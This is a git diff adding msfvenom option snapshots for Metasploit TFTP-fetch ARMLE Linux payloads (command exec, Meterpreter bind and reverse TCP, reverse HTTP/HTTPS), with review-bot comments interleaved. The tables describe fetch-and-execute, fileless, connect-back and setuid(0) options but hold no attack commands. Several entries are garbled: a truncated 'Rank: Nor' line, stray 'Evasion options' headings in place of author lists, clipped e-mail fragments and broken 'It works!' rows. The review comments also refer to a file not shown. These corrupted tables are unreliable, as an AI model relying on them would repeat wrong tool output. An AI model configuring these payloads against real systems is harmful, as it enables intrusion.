@@ -0,0 +1,68 @@ + + Name: TFTP Fetch, Linux Execute Command + Module: payload/cmd/linux/tftp/armle/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Jonathan Salwan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME OsoXsmpBmL no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. 
+ Execute an arbitrary command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..f2083e2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter-bind_tcp.txt 
@@ -0,0 +1,96 @@ + + Name: TFTP Fetch, Bind TCP Stager + Module: payload/cmd/linux/tftp/armle/meterpreter/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + nemo + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME mSdkFloTxERi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..eed09e2 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,102 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/armle/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Nor +Evasion options for payload/cmd/linux/tftp/armle/meterpreter/reverse_tcp: +========================= + + nemo + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME IRkTbQtl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no 
Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..777cd36 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_http.txt 
@@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/armle/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/armle/meterpreter_reverse_http: +========================= + +cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME XFItGigtDyI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..5df1244 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_https.txt 
@@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/armle/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/armle/meterpreter_reverse_https: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dOyIZBnzJJP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to 
use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..1753df4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-meterpreter_reverse_tcp.txt 
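Review bot: the Provided by: block of cmd-linux-tftp-armle-meterpreter_reverse_https.txt (the hunk above) is corrupted: where the author list should be, the file carries an "Evasion options for payload/cmd/linux/tftp/armle/meterpreter_reverse_https:" heading, a bare "=========================" rule and the fragment "ok@rapid7.com>" before "timwr", while the sibling cmd-linux-tftp-armle-meterpreter_reverse_tcp.txt lists Brendan Watters, Spencer McIntyre, Adam Cammack, Brent Cook and timwr cleanly. A trailing section header pulled forward and an e-mail address cut at the angle bracket point at the capture step either interleaving output streams or treating an angle-bracketed address as markup; the same damage appears in cmd-linux-tftp-mips64-meterpreter_reverse_http.txt further down. Please regenerate both files from the raw msfvenom output rather than hand-patching them. The HttpUnknownRequestResponse row is broken in the same two files: its current setting survives only as a bare "It works!" on its own lines, so the wrapper around the default was stripped or rendered away and the row no longer reads as one Name / Current Setting / Required / Description line.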
@@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/armle/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME fbCKMLnTM no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the 
functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-shell-bind_tcp.txt new file mode 100644 index 0000000..fcbc5a4 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-tftp-armle-shell-bind_tcp.txt 
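Review bot: in cmd-linux-tftp-armle-meterpreter_reverse_tcp.txt (the hunk above) the FETCH_FILENAME current setting "fbCKMLnTM" is a per-run random string, as are "dOyIZBnzJJP", "VDHecTvPvunA", "auLFBDkDm", "POpqisoXHgYa", "BewNPvfLMi" and "ULcUboOIOpD" in the neighbouring files, and the HttpUserAgent default likewise differs between files (a Windows NT 10.0 string in the armle reverse_https file, a Macintosh string in the mips64 reverse_http file). Committing these values as captured means every regeneration of the snapshots will produce a spurious diff in those rows. Either normalise those columns in whatever produces these files (replace the random default with a fixed placeholder such as "(random)") or note alongside the snapshots that msfvenom randomises those two defaults, so reviewers do not chase them.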
